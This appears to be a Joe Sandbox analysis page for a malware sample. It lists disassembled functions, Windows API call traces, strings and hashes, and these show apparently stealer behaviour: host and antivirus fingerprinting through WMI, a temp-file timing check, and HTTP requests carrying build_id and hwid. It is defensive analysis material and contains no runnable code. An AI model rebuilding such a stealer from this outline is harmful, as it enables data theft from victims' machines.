• String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6$Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6$sqlite3.dll$sqlite3.dll$sqlo.dll$sqlo.dll
• API String ID: 2840494320-2782864256
• Opcode ID: c1859fb64b6113793bec0f76e4ccdf4166cdc85b8309d8af74c6ccc68fc6e624
• Instruction ID: 79ff02477260236a32818b8b23ab03f335597ce7e23f860132b5275d5df1f08a
• Opcode Fuzzy Hash: c1859fb64b6113793bec0f76e4ccdf4166cdc85b8309d8af74c6ccc68fc6e624
• Instruction Fuzzy Hash: 9091FA32E4021C9BCB50FB66EC429ADB775BF40700F514165FA44BB126DF79BE09AB84

Control-flow Graph

control_flow_graph 1182 fe1656-fe168e GetTempPathW 1183 fe17f9-fe17fb 1182->1183 1184 fe1694-fe16bb wsprintfW 1182->1184 1185 fe17ea-fe17f8 call ffcab4 1183->1185 1186 fe16c0-fe16e5 CreateFileW 1184->1186 1186->1183 1188 fe16eb-fe173e GetProcessHeap RtlAllocateHeap _time64 srand rand call 10036b0 WriteFile 1186->1188 1188->1183 1192 fe1744-fe174a 1188->1192 1192->1183 1193 fe1750-fe178c call 10036b0 CloseHandle CreateFileW 1192->1193 1193->1183 1196 fe178e-fe17a1 ReadFile 1193->1196 1196->1183 1197 fe17a3-fe17a9 1196->1197 1197->1183 1198 fe17ab-fe17e1 call 10036b0 GetProcessHeap RtlFreeHeap CloseHandle 1197->1198 1198->1186 1201 fe17e7-fe17e9 1198->1201 1201->1185
APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 00FE1686
• wsprintfW.USER32 ref: 00FE16AC
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 00FE16D6
• GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 00FE16EE
• RtlAllocateHeap.NTDLL(00000000), ref: 00FE16F5
• _time64.MSVCRT ref: 00FE16FE
• srand.MSVCRT ref: 00FE1705
• rand.MSVCRT ref: 00FE170E
• _memset.LIBCMT ref: 00FE171E
• WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00FE1736
• _memset.LIBCMT ref: 00FE1753
• CloseHandle.KERNEL32(?), ref: 00FE1761
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 00FE177D
• ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 00FE1799
• _memset.LIBCMT ref: 00FE17AE
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FE17B8
• RtlFreeHeap.NTDLL(00000000), ref: 00FE17BF
• CloseHandle.KERNEL32(?), ref: 00FE17CB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
• String ID: %s%s$delays.tmp
• API String ID: 1620473967-1413376734
• Opcode ID: a6b3180b04d8f29eeb3185bf12dd6f92953d3f492677f36a9012c68319fe5053
• Instruction ID: d6f4f3b14e918c7a5c3aaa70b96bf6f97970de4b81660ead8b8b4720717bfb96
• Opcode Fuzzy Hash: a6b3180b04d8f29eeb3185bf12dd6f92953d3f492677f36a9012c68319fe5053
• Instruction Fuzzy Hash: 6E4162B1900219ABEB319B729C4CE9B7BBDFF89B21F0045A9B14AD1041DB7A4D54DF60

Control-flow Graph (function fe4b20-fe5228): InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, InternetSetOptionA, lstrlenA, HttpSendRequestA, InternetReadFile, InternetCloseHandle
APIs
  • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
  • Part of subcall function 00FE4AA7: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00FE4AD9
  • Part of subcall function 00FE4AA7: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00FE4ADF
  • Part of subcall function 00FE4AA7: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00FE4AE5
  • Part of subcall function 00FE4AA7: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00FE4AF7
  • Part of subcall function 00FE4AA7: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00FE4AFF
  • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
• InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00FE4BBF
• StrCmpCA.SHLWAPI(?), ref: 00FE4BDD
• InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FE4D75
• HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00FE4DB9
• InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00FE4DE7
  • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
  • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
  • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
  • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
  • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
  • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
• lstrlenA.KERNEL32(?,010159AB,",build_id,01016814,------,01016808,",hwid,010167F4,------), ref: 00FE50E0
• lstrlenA.KERNEL32(?,?,00000000), ref: 00FE50F3
• HttpSendRequestA.WININET(00000000,?,00000000), ref: 00FE5101
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00FE515E
• InternetCloseHandle.WININET(00000000), ref: 00FE5169
• InternetCloseHandle.WININET(?), ref: 00FE5180
• InternetCloseHandle.WININET(?), ref: 00FE518C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
• String ID: "$"$------$------$------$build_id$hwid
• API String ID: 3006978581-3960666492
• Opcode ID: 6c2626e800eeaf311f9eaf054aabb43aba5c6480364eadd02f943b2390c601d0
• Instruction ID: 25e5f2bf55560cac4ff10b762bffcbc581090c7807af54f5f82b1d0e2c738b00
• Opcode Fuzzy Hash: 6c2626e800eeaf311f9eaf054aabb43aba5c6480364eadd02f943b2390c601d0
• Instruction Fuzzy Hash: 2B02A332D1516E9ACB60AB21DC42AEDB7B5FF04340F4140E1A64877126DEB97F86AFC0

Control-flow Graph

APIs
• __EH_prolog3_catch_GS.LIBCMT ref: 00FF1A31
• CoInitializeEx.OLE32(00000000,00000000,0000004C,00FF40D6,Install Date: ,01015898,00000000,Windows: ,01015888,Work Dir: In memory,01015870), ref: 00FF1A42
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00FF1A53
• CoCreateInstance.OLE32(01011F18,00000000,00000001,01011E48,?), ref: 00FF1A6D
• CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00FF1AA3
• VariantInit.OLEAUT32(?), ref: 00FF1AFE
  • Part of subcall function 00FF197A: __EH_prolog3_catch.LIBCMT ref: 00FF1981
  • Part of subcall function 00FF197A: CoCreateInstance.OLE32(010121C8,00000000,00000001,0101A004,?,00000018,00FF1B24,?), ref: 00FF19A4
  • Part of subcall function 00FF197A: SysAllocString.OLEAUT32(?), ref: 00FF19B1
  • Part of subcall function 00FF197A: _wtoi64.MSVCRT ref: 00FF19E4
  • Part of subcall function 00FF197A: SysFreeString.OLEAUT32(?), ref: 00FF19FD
  • Part of subcall function 00FF197A: SysFreeString.OLEAUT32(00000000), ref: 00FF1A04
• FileTimeToSystemTime.KERNEL32(?,?), ref: 00FF1B2D
• GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FF1B39
• HeapAlloc.KERNEL32(00000000), ref: 00FF1B40
• VariantClear.OLEAUT32(?), ref: 00FF1B7F
• wsprintfA.USER32 ref: 00FF1B6C
  • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                                                                                                                                                          • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                                                                                                                                                                                                          • API String ID: 2280294774-461178377
                                                                                                                                                                                                                                                          • Opcode ID: 0aeadb973464901c3081f4cca288d8fddde5b281ec562d78255664ca3ed08271
                                                                                                                                                                                                                                                          • Instruction ID: cbe9bceba38a52eca3c1454fe7994a9ebbfe9f5e862732b2c1d1a73afc6077b5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0aeadb973464901c3081f4cca288d8fddde5b281ec562d78255664ca3ed08271
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14414972940209FBCB219BD6DC48EEFBBBDFFCAB11F104109F641AA194D6799941DB20

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 1430 fe5229-fe52bb call ff073c call fe4aa7 GetProcessHeap RtlAllocateHeap InternetOpenA StrCmpCA 1435 fe52bf-fe52c5 1430->1435 1436 fe52bd 1430->1436 1437 fe543d-fe545f InternetCloseHandle call fe2910 * 2 1435->1437 1438 fe52cb-fe52f1 InternetConnectA 1435->1438 1436->1435 1452 fe5465-fe5473 call ffcab4 1437->1452 1439 fe52f7-fe5332 HttpOpenRequestA 1438->1439 1440 fe5431-fe5437 InternetCloseHandle 1438->1440 1442 fe5338-fe533a 1439->1442 1443 fe5425-fe542b InternetCloseHandle 1439->1443 1440->1437 1445 fe533c-fe5352 InternetSetOptionA 1442->1445 1446 fe5358-fe538e HttpSendRequestA HttpQueryInfoA 1442->1446 1443->1440 1445->1446 1448 fe53ad-fe53af 1446->1448 1449 fe5390-fe53a8 call fe2910 * 2 1446->1449 1448->1443 1453 fe53b1 1448->1453 1449->1452 1456 fe541d-fe5423 1453->1456 1456->1443 1459 fe53b3-fe53da InternetReadFile 1456->1459 1459->1443 1461 fe53dc-fe541b 1459->1461 1461->1456 1461->1461
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
                                                                                                                                                                                                                                                            • Part of subcall function 00FE4AA7: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00FE4AD9
                                                                                                                                                                                                                                                            • Part of subcall function 00FE4AA7: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00FE4ADF
                                                                                                                                                                                                                                                            • Part of subcall function 00FE4AA7: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00FE4AE5
                                                                                                                                                                                                                                                            • Part of subcall function 00FE4AA7: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00FE4AF7
                                                                                                                                                                                                                                                            • Part of subcall function 00FE4AA7: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00FE4AFF
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00FE5270
                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00FE5277
                                                                                                                                                                                                                                                          • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 00FE5299
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 00FE52B3
                                                                                                                                                                                                                                                          • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FE52E3
                                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00FE5322
                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00FE5352
                                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FE535D
                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00FE5386
                                                                                                                                                                                                                                                          • InternetReadFile.WININET(?,?,00000400,?), ref: 00FE53CC
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00FE542B
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00FE5437
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00FE5443
                                                                                                                                                                                                                                                          Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                                                                                                                                                          • String ID: GET
                                                                                                                                                                                                                                                          • API String ID: 442264750-1805413626
                                                                                                                                                                                                                                                          • Opcode ID: abed33d5800e583a6319bc33beb4f94e0e79b08524d00d11fac794444e405a4c
                                                                                                                                                                                                                                                          • Instruction ID: 6722bf070255fe5219feae7fe5008f5b4cf174a0a0c9f4340497ca90962d406d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: abed33d5800e583a6319bc33beb4f94e0e79b08524d00d11fac794444e405a4c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8251197290096CAFDB209F65EC84BEFBBB9EB08756F4040A5FA09A2140D7755F809F90

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 1508 ff1bba-ff1c1e call 100eb3d CoInitializeEx CoInitializeSecurity CoCreateInstance 1512 ff1c24-ff1c50 CoSetProxyBlanket 1508->1512 1513 ff1cc3-ff1cc8 1508->1513 1515 ff1c54-ff1c56 1512->1515 1514 ff1cdc call ff070a 1513->1514 1519 ff1ce1-ff1ce8 call 100ebe2 1514->1519 1517 ff1cbc-ff1cc1 1515->1517 1518 ff1c58-ff1c63 1515->1518 1517->1514 1520 ff1cb6-ff1cd7 1518->1520 1521 ff1c65-ff1c7a 1518->1521 1520->1514 1521->1520 1526 ff1c7c-ff1cb4 VariantInit call ff1f65 call ff070a VariantClear 1521->1526 1526->1519
APIs
• __EH_prolog3_catch.LIBCMT ref: 00FF1BC1
• CoInitializeEx.OLE32(00000000,00000000,00000030,00FF4144,?,AV: ,010158AC,Install Date: ,01015898,00000000,Windows: ,01015888,Work Dir: In memory,01015870), ref: 00FF1BD0
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00FF1BE1
• CoCreateInstance.OLE32(01011F18,00000000,00000001,01011E48,?), ref: 00FF1BFB
• CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00FF1C31
• VariantInit.OLEAUT32(?), ref: 00FF1C80
  • Part of subcall function 00FF1F65: LocalAlloc.KERNEL32(00000040,00000005,?,?,00FF1CA3,?), ref: 00FF1F6D
  • Part of subcall function 00FF1F65: CharToOemW.USER32(?,00000000), ref: 00FF1F79
  • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
• VariantClear.OLEAUT32(?), ref: 00FF1CAE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
• String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
• API String ID: 4288110179-315474579
• Opcode ID: 06eff91273f578cd1326b06d9ab9c0885f113232a28aa466600e16e6d4616dd1
• Instruction ID: a544237a80ca2592c7d6970ab5ac31887c751c654d44e474c46d893186084d81
• Opcode Fuzzy Hash: 06eff91273f578cd1326b06d9ab9c0885f113232a28aa466600e16e6d4616dd1
• Instruction Fuzzy Hash: 86311E75A40209BBDB21DB96CC49EEFBB7DFFC6B10F10410DF651AA2A4C6755901DB20

Control-flow Graph

[Control-flow graph image: function fe1274-fe13e5; its basic blocks call subfunction 10036b0 twice, lstrcatA 13 times, subfunctions ff0ea8, ff0e76 and ffcab4, and ExitProcess]
APIs
• _memset.LIBCMT ref: 00FE1297
• _memset.LIBCMT ref: 00FE12A6
• lstrcatA.KERNEL32(?,01019A90), ref: 00FE12C0
• lstrcatA.KERNEL32(?,01019A94), ref: 00FE12CE
• lstrcatA.KERNEL32(?,01019A98), ref: 00FE12DC
• lstrcatA.KERNEL32(?,01019A9C), ref: 00FE12EA
• lstrcatA.KERNEL32(?,01019AA0), ref: 00FE12F8
• lstrcatA.KERNEL32(?,01019AA4), ref: 00FE1306
• lstrcatA.KERNEL32(?,01019AA8), ref: 00FE1314
• lstrcatA.KERNEL32(?,01019AAC), ref: 00FE1322
• lstrcatA.KERNEL32(?,01019AB0), ref: 00FE1330
• lstrcatA.KERNEL32(?,01019AB4), ref: 00FE133E
• lstrcatA.KERNEL32(?,01019AB8), ref: 00FE134C
• lstrcatA.KERNEL32(?,01019ABC), ref: 00FE135A
• lstrcatA.KERNEL32(?,01019AC0), ref: 00FE1368
  • Part of subcall function 00FF0EA8: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FE1375), ref: 00FF0EB4
  • Part of subcall function 00FF0EA8: HeapAlloc.KERNEL32(00000000,?,?,?,00FE1375), ref: 00FF0EBB
  • Part of subcall function 00FF0EA8: GetComputerNameA.KERNEL32(00000000,00FE1375), ref: 00FF0ECF
• ExitProcess.KERNEL32 ref: 00FE13D3
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: lstrcat$HeapProcess_memset$AllocComputerExitName
• String ID:
• API String ID: 1553874529-0
• Opcode ID: 4d96e3579ef077f2a48d4d854304455f48eed54728cda688fb4e3f278c1e900a
• Instruction ID: a9b32a7158535590fe86271f900f5eb602953c02769bd7b4b68722ab14ea6071
• Opcode Fuzzy Hash: 4d96e3579ef077f2a48d4d854304455f48eed54728cda688fb4e3f278c1e900a
• Instruction Fuzzy Hash: 1F41C5B2D0426C6BCF20DBB28C19EDB7FACAF15324F904591E5D9E7005D7789A88CB90

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,010157BB,00000000,?,?), ref: 00FF1496
                                                                                                                                                                                                                                                          • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00FF14D3
                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00FF1500
                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 00FF151F
                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00FF1555
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FF156A
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,01015DBC), ref: 00FF15FF
                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00FF1669
                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00FF1689
                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00FF1695
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: Closelstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
• String ID: - $%s\%s$?
• API String ID: 2394436309-3278919252
• Opcode ID: 766d18cfba8e1b00062d8d4768ca6093c6858653cc487cc37881fae9500e0e6f
• Instruction ID: d418dde6cdb1271931e9cac1ddf5416bdd4f0cb04efa6e403ef8737f87b23b76
• Opcode Fuzzy Hash: 766d18cfba8e1b00062d8d4768ca6093c6858653cc487cc37881fae9500e0e6f
• Instruction Fuzzy Hash: 9461D87590012C9BEB20DB25DD84EEEB7B9FF45300F5086D6A608A2122DF746F85DF90
